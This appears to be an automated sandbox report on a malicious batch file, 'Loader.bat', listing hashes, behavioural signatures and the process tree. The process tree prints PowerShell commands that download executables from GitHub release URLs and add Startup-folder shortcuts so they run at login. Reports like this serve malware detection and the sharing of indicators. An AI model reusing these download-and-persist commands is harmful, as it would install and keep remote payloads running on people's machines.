Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-11-2024 12:14
Static task
static1
Behavioral task
behavioral1
Sample
Loader.bat
Resource
win7-20240903-en
General
-
Target
Loader.bat
-
Size
1KB
-
MD5
de5a66871a7e14fe1c7d56db9aa2e8e5
-
SHA1
c119aea04d27dd918b9aa3b734271707098cd022
-
SHA256
5fbc4bddd26765b3c6f1b0ab2af444bf72f6e589ac6d289db2e4b7c8b195874e
-
SHA512
24a452d84c478d733c6d0e23d62dfca3e629720542cae36164522bfe631a05d53bafcb91c3f70ccea669c662a5fcb0b728cc56305486c9358e6c60123044e5a5
Malware Config
Signatures
-
pid Process 2996 powershell.exe 2620 powershell.exe 1140 powershell.exe 2744 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1140 powershell.exe 2996 powershell.exe 2744 powershell.exe 2620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 2996 powershell.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 2620 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2940 wrote to memory of 1140 2940 cmd.exe 31 PID 2940 wrote to memory of 1140 2940 cmd.exe 31 PID 2940 wrote to memory of 1140 2940 cmd.exe 31 PID 2940 wrote to memory of 2996 2940 cmd.exe 32 PID 2940 wrote to memory of 2996 2940 cmd.exe 32 PID 2940 wrote to memory of 2996 2940 cmd.exe 32 PID 2940 wrote to memory of 2744 2940 cmd.exe 33 PID 2940 wrote to memory of 2744 2940 cmd.exe 33 PID 2940 wrote to memory of 2744 2940 cmd.exe 33 PID 2940 wrote to memory of 2620 2940 cmd.exe 34 PID 2940 wrote to memory of 2620 2940 cmd.exe 34 PID 2940 wrote to memory of 2620 2940 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/drf/releases/download/d/loader.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"2⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"2⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y5MRRDMGEW50ZEHYXGDN.temp
Filesize7KB
MD5200618a654c16bae26a3d21c0262efbd
SHA1f6aa4baaaa8c16a4c09d1cd6dbd5d0244103402d
SHA256245c1de76d1e41107418b3611761ecd591a844a7fc20e3498e6a616b428ceb43
SHA512a885196faffe4b4af5d13799b5bfd8083fa1cff578dbd32d5fad511183a73ad2a8855501fbab27586d7a31d0ec25b8c633ee204281e74d796015cb24413eaa53